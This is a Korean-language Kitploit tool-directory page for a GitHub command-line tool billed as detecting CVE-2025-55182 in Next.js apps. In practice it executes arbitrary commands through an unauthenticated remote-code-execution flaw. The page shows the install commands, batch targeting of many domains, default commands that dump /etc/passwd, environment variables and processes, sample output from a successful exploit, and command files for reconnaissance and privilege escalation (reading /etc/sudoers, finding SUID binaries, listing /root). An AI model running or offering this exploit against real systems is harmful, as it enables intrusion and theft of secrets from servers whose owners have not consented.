Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-55182 — React Server Components를 사용하는 Next.js 애플리케이션에서 CVE-2025-55182 및 CVE-2025-66478을 탐지하는 명령줄 도구입니다. | Kitploit
도구/GitHubGitHub/rix4uni/cve-2025-55182
ReconnaissanceVulnerability ScannersExploitationWeb Application ExploitationInformation GatheringPenetration TestingCommand and Control
GitHubrix4uni/cve-2025-55182

CVE-2025-55182

React Server Components를 사용하는 Next.js 애플리케이션에서 CVE-2025-55182 및 CVE-2025-66478을 탐지하는 명령줄 도구입니다.

저장소 보기
6144개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-55182

React Server Components를 사용하는 Next.js 애플리케이션에서 CVE-2025-55182 및 CVE-2025-66478을 탐지하기 위한 명령줄 도구입니다.

🚀 설치

root@kitploit:~
wget -q -O /usr/bin/CVE-2025-55182 https://raw.githubusercontent.com/rix4uni/CVE-2025-55182/refs/heads/main/CVE-2025-55182 && chmod +x /usr/bin/CVE-2025-55182
wget -q -O /usr/bin/reportgenerator https://raw.githubusercontent.com/rix4uni/CVE-2025-55182/refs/heads/main/reportgenerator && chmod +x /usr/bin/reportgenerator

🛠️ 사용법

CVE-2025-55182 스캐너

기본 구문

root@kitploit:~
CVE-2025-55182 -d https://example.com

옵션

옵션설명기본값
-d, --domain대상 URL (프로토콜이 없으면 https:// 자동 추가)http://localhost:3000
-c, --command실행할 단일 명령-
-m, --multiple세미콜론으로 구분된 여러 명령-
-f, --file명령이 포함된 파일 (한 줄에 하나씩)-
-h, --help도움말 메시지 표시-

참고: 명령 옵션이 제공되지 않으면 기본 명령이 실행됩니다.

기본 명령

이 도구는 기본적으로 다음 명령을 실행합니다:

  1. cat /etc/os-release - OS 정보
  2. whoami - 현재 사용자
  3. pwd - 현재 작업 디렉터리
  4. id - 사용자 ID 및 그룹
  5. uname -a - 시스템 정보
  6. hostname -I - 네트워크 인터페이스
  7. ls -la - 디렉터리 목록
  8. cat /etc/passwd - 사용자 계정
  9. env - 환경 변수
  10. ps aux - 실행 중인 프로세스

보고서 생성기

reportgenerator 도구는 스캔 결과에서 전문적인 취약점 공개 보고서를 자동으로 생성합니다.

기능

  • 여러 대상을 병렬 스캐닝
  • 기존 보고서를 유지하는 자동 번호 매기기 (덮어쓰지 않음)
  • 보안 취약점 공개 섹션이 포함된 전문 마크다운 보고서
  • 사용자 지정 연구원 이름 및 입력 파일

기본 사용법

root@kitploit:~
# 대상 도메인이 포함된 파일 생성
echo -e "https://target1.com\nhttps://target2.com" > subs.txt

# 보고서 생성기 실행
reportgenerator

옵션

플래그설명기본값
--file대상 도메인이 포함된 입력 파일subs.txt
--user공개 섹션의 연구원 이름Bhagirath Saxena

예시

root@kitploit:~
# 기본 설정 사용 (subs.txt, Bhagirath Saxena)
reportgenerator

# 사용자 지정 대상 파일 사용
reportgenerator --file targets.txt

# 사용자 지정 연구원 이름 사용
reportgenerator --user "John Doe"

# 두 옵션 모두 사용
reportgenerator --file my-targets.txt --user "Jane Smith"

출력 구조

보고서는 두 개의 디렉터리에 생성됩니다:

  • textfile/ - 원시 스캔 출력 (번호 매겨짐: 1.txt, 2.txt 등)
  • mdfile/ - 전문 마크다운 보고서 (번호 매겨짐: 1.md, 2.md 등)

참고: 자동 번호 매기기 기능은 기존 보고서가 절대 덮어쓰여지지 않도록 보장합니다. 새 스캔은 가장 높은 기존 번호부터 계속됩니다.

보고서 형식

생성된 각 보고서에는 다음이 포함됩니다:

  1. 보안 취약점 공개 - 전문적인 소개 편지
  2. 대상 - 테스트된 도메인
  3. 실행된 명령 - 테스트 중 실행된 명령 목록
  4. 취약점 요약 - CVE 세부 정보 및 영향 평가
  5. 악용 세부 정보 - 실행 상태가 포함된 명령 출력
  6. 실행 요약 - 각 명령의 성공/실패를 보여주는 표
  7. 영향 분석 - 심각도 평가 및 관찰 사항
  8. 권장 사항 - 보안 팀을 위한 수정 단계
  9. 참고 자료 - CVE 세부 정보 및 보안 권고에 대한 링크

🎨 출력 예시

성공적인 익스플로잇

root@kitploit:~
▼ 🎯 대상: https://vulnerable-app.com
▼ 📋 실행할 명령: 10
  • cat /etc/os-release
  • whoami
  • pwd
  • id
  • uname -a
  • hostname -I
  • ls -la
  • cat /etc/passwd
  • env
  • ps aux

[1/10] 실행 중: cat /etc/os-release
▼ 💻 OS 정보
║ NAME="Ubuntu"
║ VERSION="22.04.3 LTS (Jammy Jellyfish)"
║ ID=ubuntu
║ ID_LIKE=debian
║ PRETTY_NAME="Ubuntu 22.04.3 LTS"
║ ...

[2/10] 실행 중: whoami
▼ 👤 현재 사용자
║ www-data
...

[3/10] 실행 중: pwd
▼ 📂 현재 디렉터리
║ /var/www/html
...

부분 성공

root@kitploit:~
[6/10] 실행 중: hostname -I
╔════════════════════════════════════════════════════════════╗
║ 명령 실패: hostname -I
║ 이 명령을 사용할 수 없거나 서버에서 거부했습니다
╚════════════════════════════════════════════════════════════╝

[!] 대체 네트워크 명령 시도 중...
▼ 🌐 네트워크 인터페이스 (대체)
║ 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
║     link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
║     inet 127.0.0.1/8 scope host lo
║        valid_lft forever preferred_lft forever
...

🔧 기술 세부 정보

취약점

  • CVE: CVE-2025-55182
  • 유형: 프로토타입 오염 → RCE
  • 영향: 특정 구성의 Next.js 애플리케이션
  • 벡터: 조작된 multipart/form-data를 포함한 HTTP POST
  • 영향: 애플리케이션 사용자로서의 인증되지 않은 원격 코드 실행

📚 참고 자료

  • CVE-2025-55182 세부 정보
  • Next.js 보안 권고

commands/ 디렉토리 예시:

다양한 시나리오에 대한 샘플 명령 파일을 생성합니다:

root@kitploit:~
# commands/basic-recon.txt
whoami
id
uname -a
cat /etc/os-release
hostname
root@kitploit:~
# commands/network-recon.txt
ifconfig
netstat -tulpn
iptables -L
cat /etc/hosts
cat /etc/resolv.conf
root@kitploit:~
# commands/privilege-escalation.txt
sudo -l
find / -perm -4000 2>/dev/null
cat /etc/sudoers
ls -la /root/
도구 다운로드